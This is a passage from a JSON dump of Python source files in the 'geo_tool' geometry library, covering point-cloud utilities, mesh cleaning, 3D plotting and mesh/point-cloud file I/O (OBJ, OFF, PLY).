Cuboid.bounding_box_of_3d_points(self.points)\n\n def center_in_unit_sphere(self):\n self.points = Point_Cloud.center_points(self.points, center='unit_sphere')\n return self\n\n def center_in_unit_cube(self):\n self.points = Point_Cloud.center_points(self.points, center='unit_cube')\n return self\n\n def plot(self, show=True, show_axis=True, in_u_sphere=True, marker='.', s=8, alpha=.8, figsize=(5, 5), color='b', elev=10, azim=240, axis=None, title=None, colormap=cm.viridis, *args, **kwargs):\n x = self.points[:, 0]\n y = self.points[:, 1]\n z = self.points[:, 2]\n\n if 'c' in kwargs: # You can't provide both 'c' and 'color'.\n color = None\n\n return Point_Cloud.plot_3d_point_cloud(x, y, z, show=show, show_axis=show_axis, in_u_sphere=in_u_sphere, marker=marker, s=s, alpha=alpha, figsize=figsize,\n color=color, axis=axis, elev=elev, azim=azim, \n title=title, *args, **kwargs)\n\n def barycenter(self):\n return np.mean(self.points, axis=0)\n\n def lex_sort(self, axis=-1):\n '''Sorts the list storing the points of the Point_Cloud in a lexicographical order.\n See numpy.lexsort\n '''\n lex_indices = np.lexsort(self.points.T, axis=axis)\n self.points = self.points[lex_indices, :]\n return self, lex_indices\n\n def k_nearest_neighbors(self, k):\n # TODO: Add kwargs of sklearn function\n nn = NearestNeighbors(n_neighbors=k + 1).fit(self.points)\n distances, indices = nn.kneighbors(self.points)\n return indices[:, 1:], distances[:, 1:]\n\n def normals_lsq(self, k, unit_norm=False):\n '''Least squares normal estimation from point clouds using PCA.\n Args:\n k (int) indicating how many neighbors the normal estimation is based upon.\n\n DOI: H. Hoppe, T. DeRose, T. Duchamp, J. McDonald, and W. Stuetzle.\n Surface reconstruction from unorganized points. In Proceedings of ACM Siggraph, pages 71:78, 1992.\n '''\n neighbors, _ = self.k_nearest_neighbors(k)\n points = self.points\n n_points = self.num_points\n N = np.zeros([n_points, 3])\n for i in xrange(n_points):\n x = points[neighbors[i], :]\n p_bar = (1.0 / k) * np.sum(x, axis=0)\n P = (x - repmat(p_bar, k, 1))\n P = (P.T).dot(P)\n [L, E] = eigh(P)\n idx = np.argmin(L)\n N[i, :] = E[:, idx]\n if unit_norm:\n row_norms = np.linalg.norm(N, axis=1)\n N = (N.T / row_norms).T\n return N\n\n def rotate_z_axis_by_degrees(self, theta, clockwise=True):\n theta = np.deg2rad(theta)\n cos_t = np.cos(theta)\n sin_t = np.sin(theta)\n R = np.array([[cos_t, -sin_t, 0],\n [sin_t, cos_t, 0],\n [0, 0, 1]])\n if not clockwise:\n R = R.T\n\n self.points = self.points.dot(R)\n return self\n\n def translate(self, trans_vector):\n self.points += trans_vector\n return self\n\n def align_to_other_pc(self, other_pc):\n ''' Stretches and translates given pc to match the extrema of the `other_pc`.\n Note: Doesn't apply rotation. Transformation applied online\n '''\n a_xmin, a_ymin, a_zmin, a_xmax, a_ymax, a_zmax = self.bounding_box().extrema\n b_xmin, b_ymin, b_zmin, b_xmax, b_ymax, b_zmax = other_pc.bounding_box().extrema\n x_ratio = (b_xmax - b_xmin) / (a_xmax - a_xmin)\n y_ratio = (b_ymax - b_ymin) / (a_ymax - a_ymin)\n z_ratio = (b_zmax - b_zmin) / (a_zmax - a_zmin)\n self.points[:, 0] *= x_ratio\n self.points[:, 1] *= y_ratio\n self.points[:, 2] *= z_ratio\n a_xmin, a_ymin, a_zmin, a_xmax, a_ymax, a_zmax = self.bounding_box().extrema\n trans_vector = np.array([(b_xmin - a_xmin), (b_ymin - a_ymin), (b_zmin - a_zmin)])\n return self.translate(trans_vector)\n\n def center_axis(self, axis=None):\n '''Makes the point-cloud to be equally spread around zero on the particular axis, i.e., to be centered. If axis is None, it centers it in all (x,y,z) axis.\n '''\n if axis is None:\n _, g0 = self.center_axis(axis=0)\n _, g1 = self.center_axis(axis=1)\n _, g2 = self.center_axis(axis=2)\n return self, [g0, g1, g2]\n else:\n r_max = np.max(self.points[:, axis])\n r_min = np.min(self.points[:, axis])\n gap = (r_max + r_min) / 2.0\n self.points[:, axis] -= gap\n return self, gap\n\n def save_as_ply(self, file_out, normals=None, color=None, binary=True):\n io.save_as_ply(self.points, file_out, normals=normals, color=color, binary=binary)\n\n def is_in_unit_sphere(self, epsilon=10e-5):\n return np.max(l2_norm(self.points, axis=1)) <= (0.5 + epsilon)\n\n def is_in_unit_cube(self, epsilon=10e-5):\n return np.max(abs(self.points)) <= (0.5 + epsilon)\n\n def is_centered_in_origin(self, epsilon=10e-5):\n '''True, iff the extreme values (min/max) of each axis (x,y,z) are symmetrically placed\n around the origin.\n '''\n return np.all(abs(np.max(self.points, 0) + np.min(self.points, 0)) < epsilon)\n\n @staticmethod\n def center_points(points, epsilon=10e-5, center='unit_sphere', force_scaling=False):\n ''' It will center the points to be symmetricaly places around the (0,0,0). It will also apply uniform scaling according to `center` and `force_scaling`.\n Input:\n center: 'unit_sphere' or 'unit_cube'\n force_scaling: boolean, if True, then even if the points are already inside the unit sphere/cube it will stretch them so that the (maximum) anti-diametric points lie exactly on the boundary.\n '''\n pc = Point_Cloud(points)\n\n if not pc.is_centered_in_origin(epsilon=epsilon):\n pc.center_axis()\n\n if center == 'unit_sphere':\n if not pc.is_in_unit_sphere(epsilon=epsilon) or force_scaling:\n max_dist = np.max(l2_norm(points, axis=1)) # Make max distance equal to one.\n pc.points /= (max_dist * 2.0)\n\n elif center == 'unit_cube':\n if not pc.is_in_unit_cube(epsilon=epsilon) or force_scaling:\n cb = Cuboid.bounding_box_of_3d_points(pc.points)\n max_dist = cb.diagonal_length()\n pc.points /= max_dist\n else:\n raise ValueError()\n\n return pc.points\n\n @staticmethod\n def plot_3d_point_cloud(x, y, z, show=True, show_axis=True, in_u_sphere=False, marker='.', s=8, alpha=.8,\n figsize=(5, 5), elev=10, azim=240, axis=None, title=None, *args, **kwargs):\n \"\"\" Plot a 3d point-cloud via matplotlib.\n :param x: iterable of N floats, representing the x-coordinates of a 3D pointcloud\n :param y: iterable of N floats, representing the y-coordinates of a 3D pointcloud\n :param z: iterable of N floats, representing the z-coordinates of a 3D pointcloud\n \"\"\"\n\n if axis is None:\n fig = plt.figure(figsize=figsize)\n ax = fig.add_subplot(111, projection='3d') \n else:\n ax = axis\n fig = axis\n \n if title is not None:\n plt.title(title)\n\n sc = ax.scatter(x, y, z, marker=marker, s=s, alpha=alpha, *args, **kwargs)\n ax.view_init(elev=elev, azim=azim)\n\n if in_u_sphere:\n ax.set_xlim3d(-0.5, 0.5)\n ax.set_ylim3d(-0.5, 0.5)\n ax.set_zlim3d(-0.5, 0.5)\n else:\n miv = 0.7 * np.min([np.min(x), np.min(y), np.min(z)]) # Multiply with 0.7 to squeeze free-space.\n mav = 0.7 * np.max([np.max(x), np.max(y), np.max(z)])\n ax.set_xlim(miv, mav)\n ax.set_ylim(miv, mav)\n ax.set_zlim(miv, mav)\n plt.tight_layout()\n\n if not show_axis:\n plt.axis('off')\n\n if 'c' in kwargs:\n plt.colorbar(sc)\n\n if show:\n plt.show()\n\n return fig\n\n @staticmethod\n def load(in_file):\n with open(in_file, 'rb') as f_in:\n res = cPickle.load(f_in)\n return res\n"
},
{
"alpha_fraction": 0.6458919048309326,
"alphanum_fraction": 0.6510167121887207,
"avg_line_length": 32.793296813964844,
"blob_id": "302da167358c2c18dabf532ec1f5c2c94e2361e0",
"content_id": "ca57a361cf980c3a2e7a2fa03cea0232b459c568",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6049,
"license_type": "permissive",
"max_line_length": 115,
"num_lines": 179,
"path": "/solids/mesh_cleaning.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
"text": "'''\nCreated on June 14, 2016\n\n@author: Panos Achlioptas\n@contact: pachlioptas @ gmail.com\n@copyright: You are free to use, change, or redistribute this code in any way you want for non-commercial purposes.\n'''\n\nimport numpy as np\nimport warnings\nfrom collections import defaultdict\n\nfrom general_tools.arrays.basics import unique_rows\n\nfrom .. utils import linalg_utils as linalg_utils\n\n\ndef filter_vertices(self, keep_list):\n '''Filters the mesh to contain only the vertices in the input ``keep_list``.\n Also, it discards any triangles that do not contain vertices that all belong in the list.\n All changes happen in-place.\n TODO: speed_up\n '''\n\n if len(keep_list) == 0:\n raise ValueError('Provided list of nodes is empty.')\n keep_list = np.unique(keep_list)\n delete_index = set(np.arange(self.num_vertices)) - set(keep_list)\n new_order = linalg_utils.order_of_elements_after_deletion(self.num_vertices, list(delete_index))\n self.vertices = self.vertices[keep_list, :]\n clean_triangles = np.array([set(tr) - delete_index == set(tr) for tr in self.triangles.tolist()])\n clean_triangles = self.triangles[clean_triangles]\n for x in np.nditer(clean_triangles, op_flags=['readwrite']):\n x[...] = new_order[int(x)]\n self.triangles = clean_triangles\n return self\n\n\ndef filter_triangles(self, keep_list):\n if len(keep_list) == 0:\n raise ValueError('Provided list of nodes is empty.')\n\n self.triangles = self.triangles[keep_list, :]\n return self\n\n\ndef isolated_vertices(self):\n '''Returns the set of vertices that do not belong in any triangle.\n '''\n\n referenced = set(self.triangles.ravel())\n if len(referenced) == self.num_vertices:\n return set()\n else:\n return set(np.arange(self.num_vertices)) - referenced\n\n\ndef has_identical_triangles(self):\n new_tr = unique_rows(self.triangles)\n return len(new_tr) != self.num_triangles\n\n\ndef clean_identical_triangles(self, verbose=False):\n new_tr = unique_rows(self.triangles)\n if len(new_tr) != self.num_triangles:\n if verbose:\n print('Identical triangles were detected and are being deleted.')\n self.triangles = new_tr\n return self\n\n\ndef _get_non_duplicate_triangles(self):\n eqc = defaultdict(list)\n for i, row in enumerate(self.triangles):\n eqc[tuple(sorted(row))].append(i)\n return [min(v_id) for v_id in eqc.values()]\n\n\ndef has_duplicate_triangles(self):\n good_tr = _get_non_duplicate_triangles(self)\n return self.num_triangles != len(good_tr)\n\n\ndef clean_duplicate_triangles(self, verbose=False):\n '''Removed the duplicate triangles of a mesh. Two triangles are considered duplicate of each other if they\n reference the same set of vertices.\n '''\n keep_list = _get_non_duplicate_triangles(self)\n if self.num_triangles != len(keep_list):\n if verbose:\n print('Duplicate triangles were detected and are being deleted.')\n self.triangles = self.triangles[keep_list, :]\n return self\n\n\ndef clean_degenerate_triangles(self, verbose=False):\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n A = self.area_of_triangles()\n good_tr = A > 0\n if np.sum(good_tr) != self.num_triangles:\n if verbose:\n print('Deleting triangles with zero area.')\n self.triangles = self.triangles[good_tr, :]\n\n assert(all(self.area_of_triangles() > 0))\n\n A = self.angles_of_triangles()\n bad_triangles = np.where((A == 0).any(axis=1))[0]\n if bad_triangles.size > 0:\n if verbose:\n print('Deleting triangles containing angles that are 0 degrees.')\n keep = list(set(range(self.num_triangles)) - set(bad_triangles))\n self = filter_triangles(self, keep)\n return self\n\n\ndef clean_zero_area_vertices(self, verbose=False):\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n A = self.area_of_vertices()\n bad_vert = np.where(A <= 0)[0]\n if bad_vert.size > 0:\n if verbose:\n print('Deleting vertices with zero area.')\n keep_list = list(set(range(self.num_vertices)) - set(bad_vert))\n self = filter_vertices(self, keep_list)\n assert(all(self.area_of_vertices() > 0))\n return self\n\n\ndef clean_isolated_vertices(self, verbose=False):\n bad_vertices = isolated_vertices(self)\n if bad_vertices:\n if verbose:\n print('Deleting isolated vertices.')\n keep_list = list(set(range(self.num_vertices)) - bad_vertices)\n self = filter_vertices(self, keep_list)\n return self\n\n\ndef clean_identical_vertices(self, verbose=False):\n '''Removes any vertex that has exactly the same (x,y,z) coordinates with another\n vertex.\n Notes: Let v1 and v2 be two duplicate vertices and v2 being the one that will be removed.\n All the triangles that reference v2, will now reference v1.\n '''\n eqc = defaultdict(list)\n for i, row in enumerate(self.vertices):\n eqc[tuple(row)].append(i)\n\n check_list = [sorted(c) for c in eqc.values() if len(c) > 1]\n if check_list:\n if verbose:\n print('Duplicate vertices were detected and are being deleted.')\n\n keep_list = [min(v_id) for v_id in eqc.values()]\n T = self.triangles.ravel()\n for v_id in check_list:\n ix = np.in1d(T, v_id[1:]).reshape(T.shape)\n T[ix] = v_id[0]\n\n self.triangles = T.reshape(self.triangles.shape)\n filter_vertices(self, keep_list)\n clean_identical_triangles(self) # TODO - don't clean. Let caller do that.\n return self\n\n\ndef clean_mesh(self, level=3, verbose=False):\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n clean_degenerate_triangles(self, verbose)\n if level >= 2:\n clean_zero_area_vertices(self, verbose)\n clean_isolated_vertices(self, verbose)\n clean_identical_triangles(self, verbose)\n if level == 3:\n clean_duplicate_triangles(self, verbose)\n return self\n"
},
{
"alpha_fraction": 0.6130992770195007,
"alphanum_fraction": 0.628291666507721,
"avg_line_length": 30.510639190673828,
"blob_id": "1098efef999053fa3441d4ce43448e5123cac753",
"content_id": "99d0bfddeb4f06f85a8a5393cb1a93523117a5c2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2962,
"license_type": "permissive",
"max_line_length": 125,
"num_lines": 94,
"path": "/solids/plotting.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Dec 30, 2017\n\n@author: optas\n'''\n\nimport numpy as np\nimport matplotlib.pylab as plt\nimport matplotlib.cm as cm\n\nfrom mpl_toolkits.mplot3d.art3d import Poly3DCollection\nfrom plotly.graph_objs import Mesh3d, Data, Scatter3d, Line\nfrom plotly.offline import iplot\n\nfrom .. point_clouds import Point_Cloud\n\n\ndef plot_mesh_via_matplotlib(in_mesh, in_u_sphere=True, axis=None, figure=None, \n figsize=(5, 5), gspec=111, colormap=cm.viridis, plot_edges=False, vertex_color=None, show=True):\n '''Alternative to plotting a mesh with matplotlib.'''\n\n faces = in_mesh.triangles\n verts = in_mesh.vertices\n\n if in_u_sphere:\n verts = Point_Cloud(verts).center_in_unit_sphere().points\n\n if figure is None:\n fig = plt.figure(figsize=figsize)\n else:\n fig = figure\n\n if axis is None:\n ax = fig.add_subplot(gspec, projection='3d')\n else:\n ax = axis\n\n mesh = Poly3DCollection(verts[faces])\n\n if plot_edges:\n mesh.set_edgecolor('k')\n\n if vertex_color is not None:\n face_color = in_mesh.triangle_weights_from_vertex_weights(vertex_color)\n mappable = cm.ScalarMappable(cmap=colormap)\n colors = mappable.to_rgba(face_color)\n colors[:, 3] = 1\n mesh.set_facecolor(colors)\n\n ax.add_collection3d(mesh)\n ax.set_xlabel(\"x-axis\")\n ax.set_ylabel(\"y-axis\")\n ax.set_zlabel(\"z-axis\")\n\n miv = 0.7 * np.min(verts) # multiply with 0.7 to squeeze empty space.\n mav = 0.7 * np.max(verts)\n ax.set_xlim(miv, mav)\n ax.set_ylim(miv, mav)\n ax.set_zlim(miv, mav)\n plt.tight_layout()\n\n if show:\n plt.show()\n else:\n return fig\n\n\ndef plot_mesh_via_plotly(in_mesh, colormap=cm.RdBu, plot_edges=None, vertex_color=None, show=True):\n '''Alternative to plotting a mesh with plotly.'''\n x = in_mesh.vertices[:, 0]\n y = in_mesh.vertices[:, 1]\n z = in_mesh.vertices[:, 2]\n simplices = in_mesh.triangles\n tri_vertices = map(lambda index: in_mesh.vertices[index], simplices) # vertices of the surface triangles\n I, J, K = ([triplet[c] for triplet in simplices] for c in range(3))\n\n triangles = Mesh3d(x=x, y=y, z=z, i=I, j=J, k=K, name='', intensity=vertex_color)\n\n if plot_edges is None: # The triangle edges are not plotted.\n res = Data([triangles])\n else:\n # Define the lists Xe, Ye, Ze, of x, y, resp z coordinates of edge end points for each triangle\n # None separates data corresponding to two consecutive triangles\n lists_coord = [[[T[k % 3][c] for k in range(4)] + [None] for T in tri_vertices] for c in range(3)]\n Xe, Ye, Ze = [reduce(lambda x, y: x + y, lists_coord[k]) for k in range(3)]\n\n # Define the lines to be plotted\n lines = Scatter3d(x=Xe, y=Ye, z=Ze, mode='lines', line=Line(color='rgb(50, 50, 50)', width=1.5))\n res = Data([triangles, lines])\n\n if show:\n iplot(res)\n else:\n return res\n"
},
{
"alpha_fraction": 0.553430438041687,
"alphanum_fraction": 0.5674128532409668,
"avg_line_length": 37.0247917175293,
"blob_id": "64cf52d56bc8ab43d47356b4daa02b56bacb308f",
"content_id": "e2fc50021faffa70a45d434b9946637e3dd2c88d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13803,
"license_type": "permissive",
"max_line_length": 185,
"num_lines": 363,
"path": "/in_out/soup.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
"text": "'''\nCreated on June 14, 2016\n\n@author: Panos Achlioptas\n@contact: pachlioptas @ gmail.com\n@copyright: You are free to use, change, or redistribute this code in any way you want for non-commercial purposes.\n'''\n\nimport os\nimport warnings\nimport re\nimport numpy as np\nfrom glob import glob\nfrom .. external_code.python_plyfile.plyfile import PlyElement, PlyData\n\ntry:\n import cv2\nexcept:\n warnings.warn('OpenCV library is not installed.')\n\n# TODO Break down in more in_out modules\n\n\ndef per_image_whitening(image):\n '''Linearly scales image to have zero mean and unit (variance) norm. The transformation is happening in_place.\n '''\n if image.dtype != np.float32:\n image = image.astype(np.float32, copy=False)\n\n if image.ndim == 2:\n n_elems = np.prod(image.shape)\n image -= np.mean(image)\n image /= max(np.std(image), 1.0 / np.sqrt(n_elems)) # Cap stdev away from zero.\n else:\n raise NotImplementedError\n\n assert(np.allclose([np.mean(image), np.var(image)], [0, 1], atol=1e-05, rtol=0))\n return image\n\n\ndef name_to_cam_position(file_name, cam_delim='-'):\n '''Given a filename produced by the FyThumb program, return the camera positions (vertex id) and\n rotation angle of the underlying rendered image file.\n '''\n file_name = os.path.basename(file_name)\n match = re.search(r'%s?(\\d+)%s(\\d+)' % (cam_delim, cam_delim), file_name)\n cam_index = int(match.group(1))\n rot_index = int(match.group(2))\n return [cam_index, rot_index]\n\n\ndef read_triangle_file(file_name):\n with open(file_name, 'r') as f_in:\n all_lines = f_in.readlines()\n n = len(all_lines)\n triangles = np.empty((n, 3), dtype=np.int32)\n pixels = np.empty((n, 2), dtype=np.int32)\n hit_coords = np.empty((n, 3), dtype=np.float32)\n for i in xrange(n):\n tokens = all_lines[i].rstrip().split(' ')\n pixels[i, :] = [int(tokens[0]), int(tokens[1])]\n triangles[i, :] = [int(tokens[2]), int(tokens[3]), int(tokens[4])]\n hit_coords[i, :] = [float(tokens[5]), float(tokens[6]), float(tokens[7])]\n return pixels, triangles, hit_coords\n\n\ndef load_views_of_shape(view_folder, file_format, shape_views=None, reshape_to=None):\n view_list = []\n cam_pos = []\n view_mask = []\n\n searh_pattern = os.path.join(view_folder, '*.' + file_format)\n for view in glob(searh_pattern):\n image = cv2.imread(view, 0) # Convert to Gray-Scale\n if reshape_to is not None:\n image = cv2.resize(image, reshape_to)\n\n reshape_to = image.shape\n view_mask.append(image != 0) # Compute mask before whiten is applied.\n # if whiten:\n # image = per_image_whitening(image)\n view_list.append(image)\n cam_pos.append(name_to_cam_position(view))\n\n if shape_views and len(view_list) != shape_views:\n raise IOError('Number of view files (%d) doesn\\'t match the expected ones (%d)' % (len(view_list), shape_views))\n elif len(view_list) == 0:\n raise IOError('There are no files of given format in this folder.')\n else:\n shape_views = len(view_list)\n\n views_tensor = np.reshape(view_list, (shape_views, reshape_to[0], reshape_to[1]))\n return views_tensor, cam_pos, np.array(view_mask)\n\n\ndef format_image_tensor_for_tf(im_tensor, whiten=True):\n new_tensor = np.zeros(im_tensor.shape, dtype=np.float32)\n if whiten:\n for ind, im in enumerate(im_tensor):\n new_tensor[ind, :, :] = per_image_whitening(im)\n return np.expand_dims(new_tensor, 3) # Add singleton trailing dimension.\n\n\ndef load_wavefront_obj(file_name, vdtype=np.float32, tdtype=np.int32):\n '''Loads the vertices, the faces and the face normals (if exist) of a wavefront .obj file.\n It ignores any textures, materials, free forms or vertex normals.\n '''\n vertices = list()\n faces = list()\n normals = list()\n\n with open(file_name, 'r') as f_in:\n for line in f_in:\n if line.startswith('#'):\n continue\n values = line.split()\n\n if not values or values[0] in ('usemtl', 'usemat', 'vt', 'mtllib', 'vp'):\n continue\n\n if values[0] == 'v':\n v = list(map(vdtype, values[1:4]))\n vertices.append(v)\n elif values[0] == 'vn':\n v = list(map(vdtype, values[1:4]))\n normals.append(v)\n elif values[0] == 'f':\n face = []\n for v in values[1:]:\n w = v.split('/')\n face.append(tdtype(w[0])) # Starts at 1. Can be negative.\n faces.append(face)\n\n vertices = np.array(vertices)\n faces = np.array(faces)\n normals = np.array(normals)\n faces = faces - 1\n if np.any(faces < 0):\n print('Negative face indexing in .obj is used.')\n n_v = vertices.shape[0]\n faces[faces < 0] = n_v - faces[faces < 0]\n\n return vertices, faces, normals\n\n\ndef write_wavefront_obj(filename, vertices, faces, vertex_normals=None):\n ''' Write a wavefront obj to a file. It will only consider: vertices, faces and (optionally) vertex normals.\n '''\n faces = faces + 1 # Starts at 1\n with open(filename, 'w') as f_out:\n # write vertices\n for v in vertices:\n f_out.write('v %f %f %f\\n' % (v[0], v[1], v[2]))\n\n # write faces\n for f in faces:\n f_out.write('f %d %d %d\\n' % (f[0], f[1], f[2]))\n\n # Write normals.\n if vertex_normals is not None:\n for vn in vertex_normals:\n f_out.write('vn %f %f %f\\n' % (vn[0], vn[1], vn[2]))\n\n\ndef load_crude_point_cloud(file_name, delimiter=' ', comments='#', dtype=np.float32, permute=None):\n '''Input: file_name (string) of a file containing 3D points. Each line of the file\n is expected to contain exactly one point. The x,y,z coordinates of the point are separated via the provided\n delimiter character(s).\n '''\n\n data = np.loadtxt(file_name, dtype=dtype, comments=comments, delimiter=delimiter)\n if permute is not None:\n if len(permute) != 3 or not np.all(np.equal(sorted(permute), np.array([0, 1, 2]))):\n raise ValueError('Permutation.')\n data = data[:, permute]\n return data\n\n\ndef load_crude_point_cloud_with_normals(file_name, delimiter=' ', comments='#', dtype=np.float32):\n '''Input: file_name (string) of a file containing 3D points. Each line of the file\n is expected to contain exactly one point with a normal vector. The x,y,z coordinates of the point are separated via the provided\n delimiter character(s).\n '''\n data = np.loadtxt(file_name, dtype=dtype, comments=comments, delimiter=delimiter)\n return data\n\n\ndef load_annotation_of_points(file_name, data_format='shape_net'):\n '''\n Loads the annotation file that describes for every point of a point cloud which part it belongs too.\n '''\n\n if data_format == 'shape_net':\n return np.loadtxt(file_name, dtype=np.int16)\n else:\n ValueError('NIY.')\n\n\ndef load_ply(file_name, with_faces=False, with_color=False):\n ply_data = PlyData.read(file_name)\n points = ply_data['vertex']\n points = np.vstack([points['x'], points['y'], points['z']]).T\n ret_val = [points]\n\n if with_faces:\n faces = np.vstack(ply_data['face']['vertex_indices'])\n ret_val.append(faces)\n\n if with_color:\n r = np.vstack(ply_data['vertex']['red'])\n g = np.vstack(ply_data['vertex']['green'])\n b = np.vstack(ply_data['vertex']['blue'])\n color = np.hstack((r, g, b))\n ret_val.append(color)\n\n if len(ret_val) == 1: # Unwrap the list\n ret_val = ret_val[0]\n\n return ret_val\n\n\ndef save_as_ply(points, file_out, normals=None, color=None, binary=True):\n if normals is None and color is None:\n vp = np.array([(p[0], p[1], p[2]) for p in points], dtype=[('x', 'f4'), ('y', 'f4'), ('z', 'f4')])\n elif color is None:\n # normals exist\n values = np.hstack((points, normals))\n vp = np.array([(v[0], v[1], v[2], v[3], v[4], v[5]) for v in values], dtype=[('x', 'f4'), ('y', 'f4'), ('z', 'f4'), ('nx', 'f4'), ('ny', 'f4'), ('nz', 'f4')])\n elif normals is None:\n # color exist\n values = np.hstack((points, color))\n vp = np.array([(v[0], v[1], v[2], v[3], v[4], v[5]) for v in values], dtype=[('x', 'f4'), ('y', 'f4'), ('z', 'f4'), ('red', 'uint8'), ('green', 'uint8'), ('blue', 'uint8')]) \n else:\n # both color and normals exist\n raise NotImplementedError()\n\n el = PlyElement.describe(vp, 'vertex')\n text = not binary\n PlyData([el], text=text).write(file_out + '.ply')\n\n\ndef load_off(file_name, vdtype=np.float32, tdtype=np.int32):\n# break_floats = lambda in_file : [vdtype(s) for s in in_file.readline().strip().split(' ')]\n break_floats = lambda in_file : [vdtype(s) for s in in_file.readline().strip().split()]\n\n with open(file_name, 'r') as f_in:\n header = f_in.readline().strip()\n if header not in ['OFF', 'COFF']:\n raise ValueError('Not a valid OFF header.')\n\n# n_verts, n_faces, _ = tuple([tdtype(s) for s in f_in.readline().strip().split(' ')]) # Disregard 3rd argument: n_edges.\n n_verts, n_faces, _ = tuple([tdtype(s) for s in f_in.readline().strip().split()]) # Disregard 3rd argument: n_edges.\n\n verts = np.empty((n_verts, 3), dtype=vdtype)\n v_color = None\n first_line = break_floats(f_in)\n verts[0, :] = first_line[:3]\n if len(first_line) > 3:\n v_color = np.empty((n_verts, 4), dtype=vdtype)\n v_color[0, :] = first_line[3:]\n for i in xrange(1, n_verts):\n line = break_floats(f_in)\n verts[i, :] = line[:3]\n v_color[i, :] = line[3:]\n else:\n for i in xrange(1, n_verts):\n verts[i, :] = break_floats(f_in)\n\n first_line = [s for s in f_in.readline().strip().split()]\n# first_line = [s for s in f_in.readline().strip().split(' ')]\n poly_type = int(first_line[0]) # 3 for triangular mesh, 4 for quads etc.\n faces = np.empty((n_faces, poly_type), dtype=tdtype)\n faces[0:] = [tdtype(f) for f in first_line[1:poly_type + 1]]\n f_color = None\n if len(first_line) > poly_type + 1: # Color coded faces.\n f_color = np.empty((n_faces, 4), dtype=vdtype)\n f_color[0, :] = first_line[poly_type + 1:]\n for i in xrange(1, n_faces):\n line = [s for s in f_in.readline().strip().split()]\n# line = [s for s in f_in.readline().strip().split(' ')]\n ptype = int(line[0])\n if ptype != poly_type:\n raise ValueError('Mesh contains faces of different dimensions. Loader in not yet implemented for this case.')\n faces[i, :] = [tdtype(f) for f in line[1:ptype + 1]]\n f_color[i, :] = [vdtype(f) for f in line[ptype + 1:]]\n else:\n for i in xrange(1, n_faces):\n line = [tdtype(s) for s in f_in.readline().strip().split()]\n# line = [tdtype(s) for s in f_in.readline().strip().split(' ')]\n if line[0] != poly_type:\n raise ValueError('Mesh contains faces of different dimensions. Loader in not yet implemented for this case.')\n faces[i, :] = line[1:]\n\n if v_color is not None and f_color is not None:\n return verts, faces, v_color, f_color\n if v_color is not None:\n return verts, faces, v_color\n if f_color is not None:\n return verts, faces, f_color\n return verts, faces\n\n\ndef load_mesh_from_file(file_name):\n dot_loc = file_name.rfind('.')\n file_type = file_name[dot_loc + 1:]\n if file_type == 'off':\n return load_off(file_name)\n elif file_type == 'obj':\n return load_wavefront_obj(file_name)\n else:\n ValueError('NIY.')\n\n\ndef write_off(out_file, vertices, faces, vertex_color=None, face_color=None):\n nv = len(vertices)\n nf, tf = faces.shape\n if tf != 3:\n raise ValueError('Not Implemented Yet.')\n\n vc = not(vertex_color is None)\n fc = not(face_color is None)\n\n if vc and fc:\n raise ValueError('Color can be specified for the faces or the vertices - not both.')\n\n with open(out_file, 'w') as fout:\n if vc or fc:\n fout.write('COFF\\n')\n else:\n fout.write('OFF\\n')\n\n fout.write('%d %d 0\\n' % (nv, nf)) # The third number is supposed to be the num of edges - but is set to 0 as per common practice.\n\n if vc:\n c = vertex_color\n for i, v in enumerate(vertices):\n fout.write('%f %f %f %f %f %f %f\\n' % (v[0], v[1], v[2], c[i, 0], c[i, 1], c[i, 2], c[i, 3]))\n for f in faces:\n fout.write('%d %d %d %d\\n' % (tf, f[0], f[1], f[2]))\n elif fc:\n for v in vertices:\n fout.write('%f %f %f\\n' % (v[0], v[1], v[2]))\n c = face_color\n for i, f in enumerate(faces):\n fout.write('%d %d %d %d %f %f %f %f\\n' % (tf, f[0], f[1], f[2], c[i, 0], c[i, 1], c[i, 2], c[i, 3]))\n else:\n for v in vertices:\n fout.write('%f %f %f\\n' % (v[0], v[1], v[2]))\n for f in faces:\n fout.write('%d %d %d %d\\n' % (tf, f[0], f[1], f[2]))\n\n\ndef write_pixel_list_to_txt(x_coord, y_coord, outfile):\n pixels = np.vstack([x_coord, y_coord])\n pixels = np.transpose(pixels) # Write each pixel pair on each own line.\n np.savetxt(outfile, pixels, fmt='%d')\n\n\ndef read_pixel_list_from_txt(in_file):\n pixels = np.loadtxt(in_file, dtype=np.int32)\n x_coord = pixels[:, 0]\n y_coord = pixels[:, 1]\n return x_coord, y_coord\n"
},
{
"alpha_fraction": 0.5971277356147766,
"alphanum_fraction": 0.6235827803611755,
"avg_line_length": 26,
"blob_id": "96be96cdafc6c3f973ee2262bba291130fe27f18",
"content_id": "7332272709174901f05cf97705cc84e5e2479126",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1323,
"license_type": "permissive",
"max_line_length": 124,
"num_lines": 49,
"path": "/point_clouds/plotting.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
